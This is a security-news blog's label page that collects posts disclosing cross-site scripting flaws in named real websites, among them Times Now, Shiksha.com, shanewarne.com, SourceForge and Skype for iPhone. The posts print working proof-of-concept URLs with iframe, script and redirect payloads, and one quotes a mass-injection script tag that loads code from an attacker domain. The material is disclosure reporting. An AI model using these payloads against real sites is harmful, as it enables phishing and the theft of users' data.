Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label XSS Injection. Show all posts
XSS Injection
Breaking News Information Security News Narendra Bhati Security researcher Vulnerability XSS Injection

Time Now Tv & Shiksha Official Websites Vulnerable To XSS Security Flaw

An 21 Years Old Information Security Expert, Narendra Bhati(R00t Sh3ll The Untracable) From Sheoganj Rajasthan ,Who Recently Acknowledge By Acquia.com and also find Many Persistent XSS And One SQL Injection In A Bank Website has discovered a non-persistent XSS security flaw in the official website of Shiksha.com,Times Of India, News Bullet Sub Domain Of Start News Channel.

Narendra Says- Kailash Bhayya ,Ravi Sir & Sabari Sir This Is For You :-)

Shiksha.com is part of the naukri.com group-Indias No.1 job portal. Other portals owned by our parent company Info Edge are 99acres.com, JeevanSathi.com, Brijj.com and AskNaukri.com.


TIMES NOW(timesnow.tv) is a Leading 24-hour English News channel that provides the Urbane viewers the complete picture of the news that is relevant, presented in a vivid and insightful manner, which enables them to widen their horizons & stay ahead.

In all these websites search fields are found to be vulnerable to the XSS injection.

POC code for Times Of India Tv:
http://www.timesnow.tv/videosearchresult.cms?query="/><iframe+src="http://www.breakthesecurity.com"+width="1000px"+height="1000px"></iframe>&srchcombo=1&x=0&y=0




POC FOR Shiksha.com :
http://www.shiksha.com/search/index?keyword="/><iframe+src="http://www.breakthesecurity.com"+width=1000+height=1000></iframe>&start=0&institute_rows=-1&content_rows=-1&country_id=&city_id=&zone_id=&locality_id=&course_level=&course_type=&min_duration=&max_duration=&search_type=&search_data_type=&sort_type=&utm_campaign=site_search&utm_medium=internal&utm_source=shiksha&from_page=homepage&autosuggestor_suggestion_shown=5
 Narendra also found that shiksha.com is also vulnerable to CSRF that allow attacker to change mobile no. of victim by a malicious web page .

Narendra also claimed that he try a lot to contact these all website by email,facebook page etc. But they not replied him from 1 month. After this he decided to disclose this vulnerability and reported to EHN. 
Read more »
XSS Injection
Cyber Security News hacker news Vulnerability XSS Injection

Shane Warne Official Website Vulnerable to XSS Security flaw


An 21 Years Old Information Security Expert, Narendra Bhati From Sheogan Rajasthan ,Who recently find Non Persistent XSS In Brother Soft Aircel & MTS Mobile And SQL Injection In A Bank Website has discovered a non-persistent XSS security flaw in the official website of Shane Warne

Narendra Want To Say That “Maa, Papa And Bhayya One Day I Will Make You Proud On Me”

Narendra found that the Search Query field in the Webpage of the www.shanewarne.com is vulnerable to  XSS attack.

Shane’s  world class talents have been recognized through a number of distinguished awards, including being named one of only five Wisden’s Cricketers of the 20th Century, in Australia’s Cricket Team of the 20th Century, BBC Sports Personality of the Year in 2005, and Victoria’s Greatest Ever Sportsman in 2002.  In 2011 Shane was honored with the unveiling of a bronze statue of him at the Melbourne Cricket Ground, and in early 2012 was inducted into the Australian Cricket Hall of Fame.         
                                   
When an attacker visits "www.shanewarne.com " and enter the xss code in the field , it successfully executes the entered script.

POC code :

http://www.shanewarne.com/search/content?q=<script>alert("E+Hacking+News")</script>

The site also allows users to inject the iframe code:
http://www.shanewarne.com/search/content?q="/><iframe+src="http://www.ehackingnews.com"+width=1000+height=1000></iframe>


Narendra also successfully in redirection that sharn warne website to another website.  After 5 seconds of loading of website the page going to redirect to inouted website. So its easy for the attacker to redirect to a phishing website or another website to make target to innocent user and steal them credentials.. ;-)

POC Code

http://www.shanewarne.com/search/content?q=<meta+http-equiv="refresh"+content="2;url=http://www.google.com/">
Read more »
XSS Injection
Cyber Security News EHN Vulnerability XSS Injection

SourceForge vulnerable to XSS injection

A security researcher WilyXem from spain has discovered Reflected cross site scripting vulnerability in SourceForge(sourceforge.net).

SourceForge is a web-based source code repository. It acts as a centralized location for software developers to control and manage free and open source software development.

The vulnerability exists in the job finding page of sourceforge. The developer fails to validate input coming frin the text box that allows user to search jobs.

This left the text field vulnerable to attack.



The poc code:
sourceforge.net/jobs?age=1&text=1%22%3E%3Cscript%3Ealert%28%22WilyXem%20==%20UnderC0de.org%22%29%3C/script%3E&zip=10003&submit=Search
Read more »
XSS Injection
SQL Injection Vulnerability Vulnerability Web Application Vulnerability XSS Injection

Over One million Pages infected by lilupophilupop.com SQL injection :XSS Injection


Last year(Yes it is last year) on Dec 1st , ISC reported about the lilupophilupop.com SQL injection attack (combined with XSS technique). When they report for first time, the number of infected pages is 80. later in the middle of the month, it raise to 160,000 . At the end of the month(Now), The infected page list crossed one million.

These sites are infected by injecting the following script :
"></title><script src="http://lilupophilupop.com/sl.php"></script>

According to their report, the infected domain are from:

  • NL - 123,000
  • FR - 68,100
  • UK - 56,300
  • DE - 49,700
  • RU - 32,000
  • DK - 31,000
  • COM - 30,500
  • JP - 23,200
  • CA - 16,600
  • ORG - 2,690
  • CN - 505

After researching the log records of the infected sites, the attackers try to attack the vulnerable sites daily from different IP address.

"I put some things you might look for in the comments section of the diary. The easiest place to start will be to look for the 500 error messages, mainly because the final injection is likely to cause your DB product to throw an error which will show as a 500 error. Even if it does not, you may be able to identify the probing queries and from those identify the final injection.

When looking at fixing the problem do not forget that this vulnerability is a coding issue. You may need to make application changes. To address the issue make sure you perform proper input validation for every parameter you accept. " Said in the First report.


Check Your Sites Infected by these Attack:
If you want to make sure, your site is infected by the attack, then search in google as:
"></title><script src="hXXp://lilupophilupop.com/sl.php"></script> site:your_site.com

replace the "your_site.com" with your site url.

Read more »
XSS Vulnerability
Hackers News INTRA Jackeh Web Application Vulnerability XSS Injection XSS Vulnerability

XSS Vulnerability in US Department of Health Human Services website

An INTRA team member ,Jackeh discovered Non-Persistant XSS (Cross-Site Scripting) vulnerability in the Disaster Information Management Research Center.

Vulnerability Details:
Type: XSS(Non-Persistent)
Targer Url: phpreparedness.nlm.nih.gov
vulnerable Link: here
Read more »
XSS Vulnerability
Application Vulnerability Vulnerability XSS Injection XSS Vulnerability

Skype for iPhone and iPod vulnerable to XSS ~Attacker able to steal data




A security Researcher,Phil discovered the XSS(Cross site Scripting) vulnerability in Skype v3.0.1 and earlier versions for iPhone and iPod touch Devices.

Skype uses a locally stored HTML file to display chat messages from other Skype users, but it fails to properly encode the incoming users "Full Name", allowing an attacker to craft malicious JavaScript code that runs when the victim views the message.


Executing arbitrary Javascript code is one thing, but he found that Skype also improperly defines the URI scheme used by the built-in webkit browser for Skype. Usually you will see the scheme set to something like, "about:blank" or "skype-randomtoken", but in this case it is actually set to "file://". This gives an attacker access to the users file system, and an attacker can access any file that the application itself would be able to access.

File system access is partially mitigated by the iOS Application sandbox that Apple has implemented, preventing an attacker from accessing certain sensitive files. However, every iOS application has access to the users AddressBook, and Skype is no exception. he created a proof of concept injection and attack that shows that a users AddressBook can indeed be stolen from an iPhone or iPod touch with this vulnerability.

Video Demo:

Read more »
Subscribe to: Posts (Atom)